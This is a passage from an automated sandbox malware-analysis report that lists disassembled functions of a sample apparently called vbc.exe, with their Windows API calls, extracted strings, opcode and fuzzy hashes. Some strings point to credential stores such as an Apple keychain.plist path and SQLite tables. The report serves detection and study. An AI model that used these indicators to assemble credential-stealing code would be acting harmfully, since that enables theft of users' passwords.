                                                                                                                                                    Function 00412D4A Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: -+A$-+A$Y,A
                                                                                                                                                    • API String ID: 2221118986-4154596189
                                                                                                                                                    • Opcode ID: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
                                                                                                                                                    • Instruction ID: 1dfdef816599cc938eba6c7f1cf8632c899ce6bbbbec6bb0dc4dd89a5a59c02f
                                                                                                                                                    • Opcode Fuzzy Hash: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
                                                                                                                                                    • Instruction Fuzzy Hash: 482156799417008FD3268F0AFE0565AB7E5FBE2702724413FE201D62B2D7B4489A8F8C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004084EE Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                    • Opcode ID: af55a290a049585f4a789644ebda92ab2dfba96c6af2a809d8ac02bd9773f267
                                                                                                                                                    • Instruction ID: d20edd04bd2483e58964879576c48f2ebc5a647496c0cba51e85d391a6ad2c86
                                                                                                                                                    • Opcode Fuzzy Hash: af55a290a049585f4a789644ebda92ab2dfba96c6af2a809d8ac02bd9773f267
                                                                                                                                                    • Instruction Fuzzy Hash: 0D118C71204601AFD328DF2DCA91A26F7E5FFD8340B60892EE4DAC7385EA75E801CB14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411A90 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00411ABC
                                                                                                                                                      • Part of subcall function 00407BF7: _snwprintf.MSVCRT ref: 00407C3C
                                                                                                                                                      • Part of subcall function 00407BF7: memcpy.MSVCRT ref: 00407C4C
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00411AE5
                                                                                                                                                    • memset.MSVCRT ref: 00411AEF
                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 00411B11
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                    • Opcode ID: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
                                                                                                                                                    • Instruction ID: 7dd1a1e3bfb09d1cc1018fb107044e1a6d1141f919409e292c6c821828e7f11b
                                                                                                                                                    • Opcode Fuzzy Hash: d6b06db8244673818a3f3970d82af9b7ba7535b9122898fd49e4c505e6d5cf51
                                                                                                                                                    • Instruction Fuzzy Hash: 48118271500119BFEF11AF61DD02EDE7BB9EF04741F100066FF05B2060E675AA608BAD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004123CC Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 004123DC
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0041240E
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00412422
                                                                                                                                                    • wcscpy.MSVCRT ref: 00412435
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3917621476-0
                                                                                                                                                    • Opcode ID: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
                                                                                                                                                    • Instruction ID: 5cda3e6a61a15ee9057d47663b3b2e0c0e874c437a77379260a47c7555d96391
                                                                                                                                                    • Opcode Fuzzy Hash: 9e530e736623199f8d1c4572649b675cce8d33ce20fed77073f00f2ac51ce3c2
                                                                                                                                                    • Instruction Fuzzy Hash: C5110CB5A00208AFDB00DFA9D9889EEB7F8FF49714F10406AE905E7200D779EB45CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042D603 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                    • String ID: sqlite_master
                                                                                                                                                    • API String ID: 438689982-3163232059
                                                                                                                                                    • Opcode ID: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
                                                                                                                                                    • Instruction ID: ee6e5cfbbe52718914f41d47f1c84030a85cc49ac4fd556a51d86816da10b362
                                                                                                                                                    • Opcode Fuzzy Hash: cbab1ddc9ac3410ad1cf84db35b40c80d29ec42151ab6fd04210e0215871e9bd
                                                                                                                                                    • Instruction Fuzzy Hash: 6901B972900218BAEB11EFB18D42FDDB77DFF04315F50405AF60462142D77A9B15C7A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CECE Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                                                                                                      • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                                                                                                                      • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040CEFB
                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040CF60
                                                                                                                                                      • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                                                                                                      • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040CF26
                                                                                                                                                    • wcscat.MSVCRT ref: 0040CF39
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                    • Opcode ID: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
                                                                                                                                                    • Instruction ID: 10942a5e8a652da15fc5691646fc128facbf295aae85401a998ce48512d7e6da
                                                                                                                                                    • Opcode Fuzzy Hash: da7172e30ee21136588dfdb1db0da8cff5898300858bdeb9120db96eb62abdf4
                                                                                                                                                    • Instruction Fuzzy Hash: 8F0184B19403057AE720E775DC8AFBB73ACAF40709F04046AB719F21C3DA79A9454A6D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414C63 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75145970,?,00414D8E,?), ref: 00414C81
                                                                                                                                                    • malloc.MSVCRT ref: 00414C88
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,75145970,?,00414D8E,?), ref: 00414CA7
                                                                                                                                                    • free.MSVCRT(00000000,?,75145970,?,00414D8E,?), ref: 00414CAE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                    • Opcode ID: e1cd2b73c96639b283147803c5e2f0a2299dd018b03378eaee566884a8c47b85
                                                                                                                                                    • Instruction ID: 08e12ed7d8240a3e2c5be9bdce3f46534c50a62d4f36ceba048af803e5c5c189
                                                                                                                                                    • Opcode Fuzzy Hash: e1cd2b73c96639b283147803c5e2f0a2299dd018b03378eaee566884a8c47b85
                                                                                                                                                    • Instruction Fuzzy Hash: CBF0E9B260A21D7E76006FB59CC0C3B7B9CD7863FDB21072FF510A2180F9659C0116B5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041538D Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004153AA
                                                                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
                                                                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004153D6
                                                                                                                                                    • GetLastError.KERNEL32 ref: 004153E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3727323765-0
                                                                                                                                                    • Opcode ID: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
                                                                                                                                                    • Instruction ID: b4c6314a975e1eba122d49f899d78a16df92238a1a9f5a4b2f2908291fae13bb
                                                                                                                                                    • Opcode Fuzzy Hash: 0612512dbcb25e72840826b50eff5f9555e3619a56fe643e0148ba0517731135
                                                                                                                                                    • Instruction Fuzzy Hash: 7201D131100608FFDB219FA4EC848EBBBB8FB80785F20442AF912D6050D6B09A44CF25
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401B06 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00401B27
                                                                                                                                                      • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                                                                    • wcslen.MSVCRT ref: 00401B40
                                                                                                                                                    • wcslen.MSVCRT ref: 00401B4E
                                                                                                                                                      • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                                                                      • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
                                                                                                                                                    • String ID: Apple Computer\Preferences\keychain.plist
                                                                                                                                                    • API String ID: 3183857889-296063946
                                                                                                                                                    • Opcode ID: 8006b7ae7f5b9b2d5e72903c8d65ba76eb4ffe7052016a765288ea2a00793178
                                                                                                                                                    • Instruction ID: 16ca9930086f175389a7ca6d9dd60f6601f6a2e2e4035c9292d9b79f31a3f5d2
                                                                                                                                                    • Opcode Fuzzy Hash: 8006b7ae7f5b9b2d5e72903c8d65ba76eb4ffe7052016a765288ea2a00793178
                                                                                                                                                    • Instruction Fuzzy Hash: F8F0FE7290531476E720A7559C89FDA736C9F00318F6005B7F514E10C3F77CAA5446AD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403081 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004030A6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 004030C3
                                                                                                                                                    • strlen.MSVCRT ref: 004030D5
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004030E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                    • Opcode ID: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
                                                                                                                                                    • Instruction ID: e51875297eda531c80c3ec5ec415ee795d437164a5b9689062039e3667910632
                                                                                                                                                    • Opcode Fuzzy Hash: c176ff0dcd1864958a99801ca3c2895d6322cf952761f758445de8014ee40b91
                                                                                                                                                    • Instruction Fuzzy Hash: 56F04FB680022CBEFB15AB949DC5DEB776CDB04254F0001A2B709E2041E5749F448B78
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BA53 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040BA78
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00443980,00000000,00000000,00000000,?,00000000,00000000), ref: 0040BA91
                                                                                                                                                    • strlen.MSVCRT ref: 0040BAA3
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040BAB4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                    • Opcode ID: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                                                                                                                    • Instruction ID: f1b04ddda804f0d23e85d9b3a1a681265272c1a7bd8491b11875ee0cd1c6d5d4
                                                                                                                                                    • Opcode Fuzzy Hash: 75b273bda8818eb1e049dc1d4f8bf93ad7451d7bf5c27d1061f7569d94d81c1b
                                                                                                                                                    • Instruction Fuzzy Hash: 7CF06DB780022CBEFB059B94DDC9DEB77ACDB04258F0001A2B709E2042E6749F44CB78
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041176D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004076CD: memset.MSVCRT ref: 004076EC
                                                                                                                                                      • Part of subcall function 004076CD: GetClassNameW.USER32 ref: 00407703
                                                                                                                                                      • Part of subcall function 004076CD: _wcsicmp.MSVCRT ref: 00407715
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00411794
                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004117A2
                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004117B0
                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004117B8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                    • Opcode ID: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                                                                                                                    • Instruction ID: 4524e9a356975b07e10c0673c8b36924071ef161512cc5bea393be377801c3c3
                                                                                                                                                    • Opcode Fuzzy Hash: 5fbb731d4b6b530c812bc277fef4d25e3eb5586c38ca31f5bfd49ebc1fc19f48
                                                                                                                                                    • Instruction Fuzzy Hash: 9AF0A435100209BBDF112F64DC05BDD3F61AF05B25F104636FA25541F5CF769990D648
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FA51 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                    • Opcode ID: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                                                                                                                    • Instruction ID: 350a086b8d7ad7ad16c9f4c49a9849c7d3de4f0e2d0f3119e9b48998a0ebe44a
                                                                                                                                                    • Opcode Fuzzy Hash: 5af77e421d670d3e9d53a45b82afc890927493f23d8260cf4e85c54301f9f1bc
                                                                                                                                                    • Instruction Fuzzy Hash: 49F0A731680310BBEB70AFA4BD4AF163A919705F57F20043AF644A60E2C7B585558B9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004048C7 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 004048DE
                                                                                                                                                      • Part of subcall function 00412455: LoadLibraryW.KERNEL32(shlwapi.dll,74EB48C0,?,004048E6,00000000), ref: 0041245E
                                                                                                                                                      • Part of subcall function 00412455: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                                                                                                                      • Part of subcall function 00412455: FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                                                                                                                    • GetDlgItem.USER32 ref: 004048F0
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404902
                                                                                                                                                    • GetDlgItem.USER32 ref: 00404914
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$Library$AddressFreeLoadProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2406072140-0
                                                                                                                                                    • Opcode ID: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                                                                                                                    • Instruction ID: 27d5e7a410d711f85fb169ee5f4284aad0304eb1bf7711d039073b83f91ac3c5
                                                                                                                                                    • Opcode Fuzzy Hash: a8f7eca7071bb80bc984f3ec153cc5aff345bc84215bcc68ba7b850d09515bab
                                                                                                                                                    • Instruction Fuzzy Hash: 33F01CB18043026BCB313F72DC09D6FBAADEF84310B010D2EA1D1D61A1CFBE94618A98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DA3A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 0040DA6F
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000000), ref: 0040DABB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                    • String ID: <M@
                                                                                                                                                    • API String ID: 909852535-3778786622
                                                                                                                                                    • Opcode ID: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                                                                                                                    • Instruction ID: 05eea1ce1b03382e5db893e26ff0cd35ef39184770bc15fe2d13ad66f6086966
                                                                                                                                                    • Opcode Fuzzy Hash: 34262e1ccb1ccbcc0d13218f904e640cd746ad35dcac150ad02d22c2cfc9d8bc
                                                                                                                                                    • Instruction Fuzzy Hash: 89518430E003049ADB20AFA5C845F9EB3A5AF44324F51853BF4197B1E2CAB99D89CB5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BABE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wcschr.MSVCRT ref: 0040BB00
                                                                                                                                                    • wcschr.MSVCRT ref: 0040BB0E
                                                                                                                                                      • Part of subcall function 004080BF: wcslen.MSVCRT ref: 004080DB
                                                                                                                                                      • Part of subcall function 004080BF: memcpy.MSVCRT ref: 004080FE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                    • String ID: "
                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                    • Opcode ID: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                                                                                                                    • Instruction ID: 425732c6536ade4c189e7d45363e94d8349111ce0189a23fa1b0a907d348dab1
                                                                                                                                                    • Opcode Fuzzy Hash: 8e9dacec36b22f36b3d6a2c9acf4b3c337cfe9fd3fa69281ad6b0cf09b24f830
                                                                                                                                                    • Instruction Fuzzy Hash: D2317E31904204ABDF04EFA5C8419EEB7F8EF44364B20816BE855B72D5DB78AA41CADC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040928C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407BD1: SetFilePointer.KERNEL32(00409553,?,00000000,00000000,?,0040935E,00000000,00000000,?,00000020,?,004094E9,?,?,00409553,00000000), ref: 00407BDE
                                                                                                                                                    • _memicmp.MSVCRT ref: 004092A6
                                                                                                                                                    • memcpy.MSVCRT ref: 004092BD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                    • String ID: URL
                                                                                                                                                    • API String ID: 2108176848-3574463123
                                                                                                                                                    • Opcode ID: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                                                                                                                    • Instruction ID: 33b3fc867a4e2474f07ea88972ed825a8fcb80c5477311fdb059a6d734a7dbfa
                                                                                                                                                    • Opcode Fuzzy Hash: cd6c5101a0353fed1380e8074d20d0c9319d1f79348dd7d2e07b117509aaf2a7
                                                                                                                                                    • Instruction Fuzzy Hash: 8411A031604208BBEB11DF29CC05F5F7BA8AF85348F054066F904AB2D2E775EE10CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407BF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                    • Opcode ID: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                                                                                                                    • Instruction ID: 0f19ce75f7d61601c6dcaf4457f6717ff276ffca2b35b3dd887d371e09c964f6
                                                                                                                                                    • Opcode Fuzzy Hash: 67cc605bc3185a31bfa90e7c216e456876c101feb6316f2713b0a5e7acf2aabe
                                                                                                                                                    • Instruction Fuzzy Hash: 87117C32908209BEEB10DFE8C9C69AE73A8BB45714F108436ED15E7141D678AA158BA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004153F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON
